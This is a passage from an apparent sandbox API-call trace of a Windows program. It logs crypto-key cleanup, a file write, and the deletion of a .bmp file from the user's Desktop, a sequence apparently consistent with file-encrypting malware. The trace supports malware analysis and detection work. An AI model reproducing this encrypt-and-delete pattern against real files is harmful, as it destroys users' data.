lpsz="A0000901A0E") returned 0xb [0103.333] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.333] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0103.333] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.333] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.333] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.333] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.333] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.333] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0103.333] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.333] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0103.333] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0103.333] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.333] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.333] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.336] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.336] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.336] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.337] WriteFile (in: hFile=0x458, lpBuffer=0x2a7a130*, nNumberOfBytesToWrite=0x80c8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesWritten=0x8cf5e4*=0x80c8, lpOverlapped=0x0) returned 1 [0103.338] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.338] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.338] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0103.338] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0103.338] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0103.338] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0103.338] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0103.338] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.338] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0103.338] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.338] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0103.338] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0103.338] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0103.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9940, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0103.339] CryptDestroyKey (hKey=0x9a4580) returned 1 [0103.339] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0103.339] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0103.339] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0103.339] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0103.339] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0103.339] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0103.339] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0103.339] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0103.339] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0103.339] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0103.339] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0103.339] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0103.339] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0103.339] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0103.339] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.339] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0103.551] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.551] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0103.551] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0103.551] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0103.551] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0103.551] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0103.551] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0103.551] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.551] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0103.551] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.551] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0103.551] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.551] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.551] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0103.551] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.551] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0103.551] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.551] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.551] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.551] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.551] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.551] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0103.551] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.552] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0103.552] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0103.552] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.552] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.552] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0103.552] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.552] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0103.552] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0103.552] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0103.552] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0103.552] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0103.552] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0103.552] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0103.552] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0103.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7200, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0103.552] CryptReleaseContext (hProv=0x9bf6e8, dwFlags=0x0) returned 1 [0103.552] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.552] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.552] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0103.552] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.552] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0103.552] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0103.553] FreeLibrary (hLibModule=0x76390000) returned 1 [0103.553] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.553] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.553] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.553] CloseHandle (hObject=0x44c) returned 1 [0103.554] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.554] CloseHandle (hObject=0x458) returned 1 [0103.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.558] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0103.558] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0103.558] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0103.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0103.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6418 [0103.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0103.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0103.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0103.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0103.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0103.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0103.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0103.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0103.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0103.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0103.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0103.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0103.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a753a8 [0103.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6418 | out: hHeap=0x2af0000) returned 1 [0103.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0103.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0103.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0103.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0103.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0103.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x46) returned 0x2a5d9d0 [0103.559] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/MH23a5.bmp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\MH23a5.bmp", lpFilePart=0x8cedf4*="MH23a5.bmp") returned 0x22 [0103.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d9d0 | out: hHeap=0x2af0000) returned 1 [0103.559] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\MH23a5.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\mh23a5.bmp")) returned 0x20 [0103.559] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\MH23a5.bmp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3022d80, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x7517fd0, ftLastAccessTime.dwHighDateTime=0x1d5d596, ftLastWriteTime.dwLowDateTime=0x7517fd0, ftLastWriteTime.dwHighDateTime=0x1d5d596, nFileSizeHigh=0x0, nFileSizeLow=0x80c1, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="MH23a5.bmp", cAlternateFileName="")) returned 0x9a3b80 [0103.559] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\MH23a5.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\mh23a5.bmp")) returned 1 [0103.575] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3022d80, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x7517fd0, ftLastAccessTime.dwHighDateTime=0x1d5d596, ftLastWriteTime.dwLowDateTime=0x7517fd0, ftLastWriteTime.dwHighDateTime=0x1d5d596, nFileSizeHigh=0x0, nFileSizeLow=0x80c1, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="MH23a5.bmp", cAlternateFileName="")) returned 0 [0103.575] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0103.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a753a8 | out: hHeap=0x2af0000) returned 1 [0103.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0103.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0103.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0103.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0103.575] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0103.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0103.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0103.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0103.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0103.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0103.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0103.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0103.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0103.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0103.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0103.576] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0103.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0103.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0103.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0103.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0103.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0103.576] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0103.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0103.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6300 [0103.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0103.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0103.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0103.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0103.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0103.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0103.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0103.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0103.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0103.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | 